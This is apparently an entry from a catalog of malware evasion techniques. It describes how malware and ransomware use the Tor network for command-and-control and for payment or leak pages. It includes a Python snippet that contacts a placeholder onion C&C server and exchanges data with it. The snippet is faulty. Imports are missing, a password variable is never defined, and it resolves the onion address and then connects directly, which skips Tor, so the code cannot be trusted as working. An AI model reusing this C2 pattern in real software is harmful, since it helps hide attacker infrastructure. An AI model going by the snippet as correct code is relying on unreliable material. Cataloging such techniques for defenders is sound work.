Tor Network C2

Created the Tuesday 23 April 2019. Updated 3 months, 1 week ago.

Tor is a free and open-source network that enables anonymous communication. It uses a network of volunteer-operated servers, known as "relays," to route internet traffic in a way that conceals the user's location and usage from surveillance and traffic analysis. By routing traffic through multiple relays, Tor makes it difficult to trace internet activity back to the user.

Malware can use the Tor network to communicate with a command and control (C&C) server in a way that is harder to detect. Ransomware often uses Tor to host the payment page and even data leak pages. By using the anonymity provided by Tor, the attackers can make it more difficult for authorities to track them down and shut down their operations.

Technique Identifier

U0903

Technique Tags

Tor Anonymous communication Internet traffic Volunteer overlay network Command and control (C&C)

Code Snippets

Description

This code uses the stem library to connect to the Tor control port and authenticate with the control password. It then creates a new circuit to the specified C&C server and resolves its address using stem.util.connection.resolve_address(). The code then establishes a connection to the C&C server over the Tor network and sends and receives data from it.

import stem
import stem.connection
import stem.util.system

# Replace with the address of your C&C server
cc_server = "xyzabc123.onion"

# Connect to the Tor control port
control_socket = stem.socket.ControlPort(port = 9051)

# Authenticate with the Tor control port
stem.connection.authenticate_password(control_socket, control_password)

# Start a new circuit to the C&C server
circuit_id = stem.control.Controller.from_port(port = 9051).new_circuit(path = [], await_build = True)

# Resolve the C&C server's address
cc_server_ip = stem.util.connection.resolve_address(cc_server)

# Connect to the C&C server
cc_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cc_socket.connect((cc_server_ip, 80))

# Send data to the C&C server
cc_socket.sendall(b"hello")

# Receive data from the C&C server
data = cc_socket.recv(1024)

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.

Defending Against Tor-Using Malware, Part 1